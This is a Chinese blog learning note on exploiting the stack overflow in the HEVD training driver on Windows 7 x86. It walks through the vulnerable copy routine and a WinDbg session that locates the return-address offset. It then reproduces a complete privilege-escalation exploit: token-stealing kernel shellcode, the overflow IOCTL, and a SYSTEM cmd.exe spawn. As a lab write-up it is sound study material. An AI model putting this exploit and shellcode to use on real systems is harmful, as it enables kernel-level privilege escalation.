Windows内核漏洞学习-栈溢出(无GS)

最新推荐文章于 2023-12-23 17:20:24 发布
最新推荐文章于 2023-12-23 17:20:24 发布
阅读量887 收藏 1
点赞数
分类专栏: 内核漏洞 学习记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38025365/article/details/106162989
版权
0x00: 前言

在上一节中,将HEVD的环境配置完成,接下来进行内核漏洞的调试复现。为什么首先做栈溢出呢,因为我以前学过一些Pwn知识,栈溢出算是最简单的漏洞了。使用的环境为:

  • Windows7 x86 虚拟机系统
  • 双机调试环境
  • HEVD靶场环境
0x01:漏洞原理
栈溢出原理

栈溢出,即在局部变量拷贝时,没有控制好拷贝进局部变量的长度。而局部变量又是保存在栈中的,一旦长度过长,就会导致数据溢出淹没栈环境,覆盖EBP甚至返回地址。

HEVD漏洞原理分析

给出实验漏洞代码。这里安全和不安全的操作都对比给出了,区别就在于一个按照内核局部变量的大小规定拷贝数据大小,一个直接按照用户层给定的size来决定拷贝的大小,后者显然是不安全的。

NTSTATUS TriggerStackOverflow(IN PVOID UserBuffer, IN SIZE_T Size) {
    NTSTATUS Status = STATUS_SUCCESS;
    ULONG KernelBuffer[BUFFER_SIZE] = {0};

    PAGED_CODE();

    __try {
        // Verify if the buffer resides in user mode
        ProbeForRead(UserBuffer, sizeof(KernelBuffer), (ULONG)__alignof(KernelBuffer));
        DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
        DbgPrint("[+] UserBuffer Size: 0x%X\n", Size);
        DbgPrint("[+] KernelBuffer: 0x%p\n", &KernelBuffer);
        DbgPrint("[+] KernelBuffer Size: 0x%X\n", sizeof(KernelBuffer));

#ifdef SECURE
        //安全的拷贝
        RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, sizeof(KernelBuffer));
#else
        DbgPrint("[+] Triggering Stack Overflow\n");
		//不安全的拷贝
        RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, Size);
#endif
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}
0x02:漏洞分析

通过在IDA中分析分发函数,可以看到该漏洞对应的IOCTL码为0x222003

在这里插入图片描述

在IDA中[编译]-[段]-[重新设置基址]可以修改基址,这样就可以找到我们想要下断的地点。这里的基址可以在WinDbg里查看。

kd> lm m H*
Browse full module list
start    end        module name
8421f000 84256000   hal        (deferred)             
88a63000 88a6b000   hwpolicy   (deferred)             
8aa00000 8aa85000   HTTP       (deferred)             
8ab49000 8ab51000   HEVD       (private pdb symbols)

在这里插入图片描述

在函数 TriggerStackOverflow 函数入口处和memcpy处下断点。

在这里插入图片描述

kd> bu 8ab4d62a
kd> bu 8ab4d6b9

接下来就开始进行调试观察,首先断在程序的入口处。可以看到返回地址为 8ab4d718,ebp为8b607ad0

Breakpoint 0 hit
HEVD!TriggerStackOverflow:
8ab4d62a 680c080000      push    80Ch
kd> k //查看线程信息
 # ChildEBP RetAddr  
00 8b607ad0 8ab4d718 HEVD!TriggerStackOverflow

继续执行断在memcpy前

kd> g
Breakpoint 1 hit
HEVD!TriggerStackOverflow+0x8f:
8ab4d6b9 e81ccbffff      call    HEVD!memcpy (8ab4a1da)
kd> dd esp //查看当前堆栈,结合IDA中汇编代码可以知道这里  8b6072b4 即为 buffer
8b607274  8b6072b4 00360a58 00000824 8ab4e5be
8b607284  8ab4e31a 00000800 8ab4e338 8b6072b4
8b607294  8ab4e3a2 00000824 8ab4e3be 00360a58
8b6072a4  01d4b2cd 875e5148 875e51b8 8ab4eda2
8b6072b4  00000000 00000000 00000000 00000000
8b6072c4  00000000 00000000 00000000 00000000
8b6072d4  00000000 00000000 00000000 00000000
8b6072e4  00000000 00000000 00000000 00000000
kd> dd 8b6072b4+0x7f0 //查看buffer末尾,看出buffer长度为0x800
8b607aa4  00000000 00000000 00000000 00000000
8b607ab4  8ab4eda2 8b6072a4 00000000 8b607bc0
8b607ac4  8ab4a080 000079c5 00000000 8b607ae0
8b607ad4  0edddcdb 00360a58 00000824 8b607afc
8b607ae4  8ab4e185 875e5148 875e51b8 87bd2458
8b607af4  87cf2148 00000000 8b607b14 83e44593
8b607b04  87cf2148 875e5148 875e5148 87cf2148
8b607b14  8b607b34 8403899f 87bd2458 875e5148
kd> k //结合下面 得到当前ebp和返回地址,因此可以看出 buffer距离返回地址的长度为0x820
 # ChildEBP RetAddr  
00 8b607ad0 0edddcdb HEVD!TriggerStackOverflow+0x8f
kd> r
eax=8b6072b4 ebx=8ab4eda2 ecx=00360a58 edx=00000065 esi=00000800 edi=00000000
eip=8ab4d6b9 esp=8b607274 ebp=8b607ad0 iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000246
HEVD!TriggerStackOverflow+0x8f:
8ab4d6b9 e81ccbffff      call    HEVD!memcpy (8ab4a1da)

通过上述的分析,我们得到了buffer距离返回地址的偏移值为0x820;接下来就是通过填充,将返回地址淹没为我们自己的地址。

kd> dd 8b6072b4+0x7f0 //查看buffer,可以看到都被填充了,返回地址被修改为0x1333060
8b607aa4  41414141 41414141 41414141 41414141
8b607ab4  41414141 41414141 41414141 41414141
8b607ac4  41414141 41414141 41414141 41414141
8b607ad4  01333060 00360a58 00000824 8b607afc
8b607ae4  8ab4e185 875e5148 875e51b8 87bd2458
8b607af4  87cf2148 00000000 8b607b14 83e44593
8b607b04  87cf2148 875e5148 875e5148 87cf2148
8b607b14  8b607b34 8403899f 87bd2458 875e5148
kd> r
eax=8b6072b4 ebx=8ab4eda2 ecx=00000000 edx=00000000 esi=00000800 edi=00000000
eip=8ab4d6c1 esp=8b6072a4 ebp=8b607ad0 iopl=0         nv up ei ng nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000282
HEVD!TriggerStackOverflow+0x97:
8ab4d6c1 eb21            jmp     HEVD!TriggerStackOverflow+0xba (8ab4d6e4)
kd> k
 # ChildEBP RetAddr  
00 8b607ad0 01333060 HEVD!TriggerStackOverflow+0x97
0x3:漏洞利用

虽然项目里有有利用代码,但是这里还是给一下别人写的完整的利用代码。后面再补充学习一下提权的知识。

#include<stdio.h>
#include<windows.h>
#define STACKOVERFLOW 0x222003
/************************************************************************/
/*		        Stack Over flow                                 		*/
/*                 Write by Thunder_J 2019.6                            */
/************************************************************************/

VOID ShellCode()
{
	//__debugbreak();
	__asm
	{
			pop    edi
			pop    esi
			pop    ebx
			pushad
			mov eax, fs:[124h]
			mov eax, [eax + 050h]
			mov ecx, eax
			mov edx, 4

		find_sys_pid :
					 mov eax, [eax + 0b8h]
					 sub eax, 0b8h
					 cmp[eax + 0b4h], edx
					 jnz find_sys_pid

					 mov edx, [eax + 0f8h]
					 mov[ecx + 0f8h], edx
					 popad
					 pop ebp
					 ret 8
	}
}

static VOID CreateCmd()
{
	STARTUPINFO si = { sizeof(si) };
	PROCESS_INFORMATION pi = { 0 };
	si.dwFlags = STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_SHOW;
	WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
	BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
	if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}

int main()
{
	char buf[0x824];
	HANDLE hDevice;
	DWORD bReturn = 0;
	//»ñÈ¡¾ä±ú
	hDevice = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
	GENERIC_READ | GENERIC_WRITE,
	FILE_SHARE_READ | FILE_SHARE_WRITE,
	NULL,
	OPEN_EXISTING,
	FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
	NULL
	);

	printf("Start to get HANDLE...\n");
	if (hDevice == INVALID_HANDLE_VALUE || hDevice == NULL)
	{
		printf("Failed to get handle...!\n");
		return 0;
	}
	//__debugbreak();
	memset(buf, 'A', 0x824);
	*(PDWORD)(buf + 0x820) = (DWORD)&ShellCode;

	// call TriggerStackOverflow()
	printf("Started to over flow...\n");
	//__debugbreak();
	DeviceIoControl(hDevice, STACKOVERFLOW, buf, 0x824,NULL,0,&bReturn,NULL);
	
	printf("Started to Create cmd...\n");
	CreateCmd();
	return 0;
}
明日计划

继续学习内核漏洞

Wwoc
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows栈溢出学习笔记
不想当脚本小子的脚本小子
02-22 1074
Windows栈溢出: 1.高级语言编译链接后变成PE文件,PE装载运行后变成进程。 2.系统栈: 操作系统为进程中的每个函数调用都划分了一个栈帧空间,(系统自动分配)系统栈是这些函数调用栈帧的集合; 系统栈由系统自动维护: 1)随着函数调用层数的增加,函数栈帧是一块块地向内存低地址方向延伸的,当前正在运行的函数的栈帧总是在栈顶; 2)随着进程中函数调用层数的减少,即各函数调用的返回,栈...
Windows内核漏洞学习-HEVD的使用
WocW的博客
05-15 2516
HEVD的使用 HEVD简单介绍和下载 ​ HEVD是一个漏洞靶场,里面有大量写好的漏洞,主要用它来学习漏洞的利用。在Github上就可以找到该项目,下面贴一下下载传送门,我用的是1.2版本。 https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/releases HEVD安装 ​ 下载好之后,程序有有漏洞和无漏洞两个版本。使用有漏洞的x86版本,根据前面学习到的驱动编程知识,将它安装到Win7 32位环境中。在安装时候选择自动执行,然后
windows内核_Windows内核漏洞利用
weixin_39900468的博客
12-30 175
堆栈缓冲区溢出在第一部分中,我们会从HackSysExtremeVulnerableDriver中的普通堆栈缓冲区溢出开始。当堆栈上存在的缓冲区获取的数据超出其存储容量时(例如,在一个16字节缓冲区中复制20个字节,就可以是字符数组或类似对象),其余数据将写入附近位置,从而有效覆盖或破坏堆栈。其核心思想是控制此溢出,这样我们可以覆盖堆栈上保存的返回地址,并且在执行当前(易受攻击的)函数...
Windows 8.1内核利用—CVE-2014-4113漏洞分析
SAKAISON的博客
09-01 2409
1.情况简介: 2014年10月14日,CrowdStrike和FireEye两家IT公司各自发布了一篇博文,在其中都不约而同地介绍了一个基于Windows系统的新型内核权限提升漏洞。CrowdStrike公司在文章中提到:他们是在追踪一个名叫Hurricane Panda(飓风熊猫)的黑客组织的过程中,发现并证实该漏洞的。该漏洞在Internet上至少已经活跃了5个月的时间
windbg分析栈溢出
Jaylon的专栏
02-23 1826
本文根据《windows高级调试》5.2.2章节提供的示例进行的实验,在win10平台,使用该书提供的bin文件进行调试,因平台不一样在实验过程中发现跟书上有些不同,本章书上的一些调试方法的正确性有待商榷(可以留言讨论)。 调试准备 (1)代码,见文章末尾; (2)将以下注册表保存到.reg后缀的文件,点击添加到注册表; Windows Registry Editor Version...
二进制漏洞挖掘-栈溢出-开启FORTIFY1
08-04
在这里,我们将重点讨论栈溢出漏洞,并且展示如何使用FORTIFY来防止这种漏洞栈溢出漏洞是指在栈缓冲区中写入数据时,未对缓冲区大小进行判断,导致写入数据长度可能大于缓冲区长度。这将导致栈溢出,攻击者可以...
Windows内核安全编程-源码
08-17
Windows内核安全编程》是一本深入探讨Windows操作系统内核安全的专著,作者寒江独钓通过本书向读者展示了如何在Windows内核层面进行安全编程。书中包含的源码是为了辅助读者理解理论知识,实践操作技巧,尤其对于...
windows内核驱动漏洞挖掘工具.rar
03-16
IOCTL Fuzzer是一个自动化的windows内核驱动漏洞挖掘工具,它利用自己的驱动hook了NtDeviceIoControlFile,目的是接管整个系统所有的IOCTL请求。当处理IOCTL请求时,一旦符合配置文件中定义的条件,IOCTL Fuzzer会用...
Windows内核漏洞Windows内核漏洞Windows平台提权漏洞集合
02-06
Windows内核漏洞 简介 Windows内核漏洞 进攻清单 #安全公告#KB#说明#操作系统 [Windows后台智能传输服务特权提升漏洞](Windows 7/8/10,2008/2012/2016/2019) [Microsoft Server Message Block 3.1.1(SMBv3...
Windows内核学习-连载1
08-03
1.保护模式 1.用far pointer 3.使用TSS Selector 4.iret的任务切换(此章主要截图) 6.使用int指令加载CS
Windows 10 内核漏洞利用防护及其绕过方法
01-05
介绍了了 Windows 10 1607 和 1703 版本中引⼊入的针对内核漏漏洞洞利利⽤用的防护措施,在此基础上将给出相应的绕过⽅方案, 从⽽而使我们能够重新获得内核态下的 RW primitives,并进⼀一步实现 KASLR 绕过以及内核中 shellcode 的执⾏行行。
c++堆栈溢出怎么解决_Windows漏洞利用开发 – 第2部分:栈溢出简介
weixin_40005542的博客
11-23 741
概观欢迎来到我的Windows漏洞利用开发系列的第2部分。在第一篇文章中,我介绍了一些基本概念,在继续第2部分及其后续部分应该掌握这些基本概念。如果你还没有这样做,我建议看看第一篇文章,以确保你牢牢掌握所有提出的概念。基于这些知识,我现在想讨论一个基于Windows的软件漏洞:基于栈的缓冲区溢出。基于堆栈的缓冲区溢出简介在这一期中,我将以维基百科的简单程序开始:在第1部分中,我提到了将大于11个字...
Windows栈溢出原理
weixin_33766805的博客
03-28 389
1.栈是什么? 栈是一种运算受限的线性表 其限制是仅允许在表的一端进行插入和删除运算 这一端称为栈顶(TOP),相对的另一端称为栈底(BASE) 向一个栈插入新元素,称作进栈、入栈或压栈(PUSH) 它是把新元素放到栈顶元素的上边,使之成为新的栈顶元素; 从一个栈删除元素,又称出栈或退栈(POP) 它是把栈顶元素删除掉,使其相邻的元素成为新的栈顶元素 进程使用的内存可以分成4个部分...
Windbg的gflags.exe调试堆栈溢出,访问越界等问题。
小七的小世界
06-28 8348
gflags.exe是Windbg下的一个小工具,非常好用,对于调试程序隐藏的bug很有帮助。  如:我在vs2015中遇到访问越界的问题,但程序不会在越界的地方发生崩溃中断,而是在一个不可能存在访问错误的地方发生了错误,以至于无法定位问题的位置。     所以在网上看到了Windbg的方法,一开始对Windbg不是很了解,熟悉之后发现Windbg很强大,虽然只用到了其中的一个小工具g
Windows内核再次出现0Day漏洞 影响win2000到win10所有版本 反病毒软件恐成瞎子
weixin_34218890的博客
09-01 141
windows 2000 到 windows 10 的最新版本, 所有操作系统的 PsSetLoadImageNotifyRoutine 中都发现了 Microsoft 内核漏洞漏洞存在于 Microsoft 提供给安全供应商的 API 中, 是为了让他们知道操作系统正在加载的文件,如果这个API出现问题,防病毒软件就成了瞎子。 问题出在Windo...
2.栈溢出简单利用
huobengle
12-02 119
看代码 #include &lt;stdio.h&gt; #include "windows.h" #define PASSWORD "1234567" int verify_password(char *password) { int authenticated; char buffer[8]; authenticated=strcmp(password,PASSWORD); s...
栈溢出第三话--GS机制
安全杂货铺
04-08 2820
参考自0day安全第二版、以及http://www.cnblogs.com/rebeyond/p/4846794.html
Windows内存漏洞——栈溢出漏洞及其利用分析
theglasssky的博客
05-25 783
windows系统中内存漏洞中关于栈溢出的部分
Windows漏洞利用开发——利用SEH绕过GS保护
最新发布
weixin_49816179的博客
12-23 460
1.了解GS编译选项,SHE异常处理机制 2.分析利用SHE异常处理机制绕过GS的原理 3.寻找溢出点 4.寻找PPR,解释为何利用PPR

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值